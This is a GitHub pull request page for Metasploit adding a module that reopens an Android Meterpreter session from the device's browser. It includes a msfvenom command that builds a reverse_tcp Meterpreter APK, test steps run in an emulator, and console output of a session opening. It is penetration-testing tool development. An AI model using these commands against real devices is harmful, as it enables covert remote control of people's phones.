Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add aux module to be able to open android meterpreter from a browser #5899

Merged
merged 1 commit into from
Sep 1, 2015
Merged

Add aux module to be able to open android meterpreter from a browser #5899

merged 1 commit into from
Sep 1, 2015

Conversation

wchen-r7
Copy link
Contributor

This auxiliary module allows you to open an android meterpreter session again from a browser.

To test this, you must make sure this is in master: rapid7/metasploit-payloads#24

And then you go ahead and do this:

  • ./msfvenom -p android/meterpreter/reverse_tcp lhost=IP lport=4444 -o /tmp/android.apk
  • Start an emulator
  • tools/install_msf_apk.sh /tmp/android.apk (this will install and open the payload)
  • Start a msfconsole
  • Start a listener for android/meterpreter/reverse_tcp. If you get a session, just exit it, and restart the listener again.
  • In msfconsole (either you start a new one or use the same one), do: use auxiliary/server/android_browsable_msf_launch
  • set URIPATH /test
  • run
  • Go back to the Android emulator, open the default browser. Looks like this:

screen shot 2015-08-27 at 2 43 56 pm

- [ ] Go to the URL that android_browsable_msf_launch is serving - [ ] The android payload listener should get a session: 
msf exploit(handler) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (58381 bytes) to 192.168.1.64
[*] Meterpreter session 6 opened (192.168.1.64:4444 -> 192.168.1.64:51166) at 2015-08-27 14:36:07 -0500

meterpreter >

@bcook-r7 bcook-r7 self-assigned this Sep 1, 2015
@bcook-r7 bcook-r7 merged commit e82bd10 into rapid7:master Sep 1, 2015
bcook-r7 pushed a commit that referenced this pull request Sep 1, 2015
Land #5899, allow opening android meterpreter from a browser
e747270
@bcook-r7
Copy link
Contributor

bcook-r7 commented Sep 1, 2015

Thanks @wchen-r7 . This merge brings us to metasploit-payloads 1.0.11, which also adds initial Windows 10 support.

bcook-r7 pushed a commit that referenced this pull request Sep 1, 2015
Land #5899, update payload sizes
941e784
@wchen-r7
Copy link
Contributor Author

wchen-r7 commented Sep 1, 2015

Cool thanks @bcook-r7 @OJ !

@timwr timwr mentioned this pull request Mar 16, 2016
Closed
@wchen-r7 wchen-r7 deleted the android_browsable_launch branch August 22, 2016 16:20
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bcook-r7 bcook-r7

Labels
feature meterpreter module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@wchen-r7 @bcook-r7